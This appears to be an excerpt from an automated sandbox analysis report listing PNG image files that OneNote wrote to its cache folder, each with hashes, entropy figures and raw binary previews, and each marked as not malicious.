                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
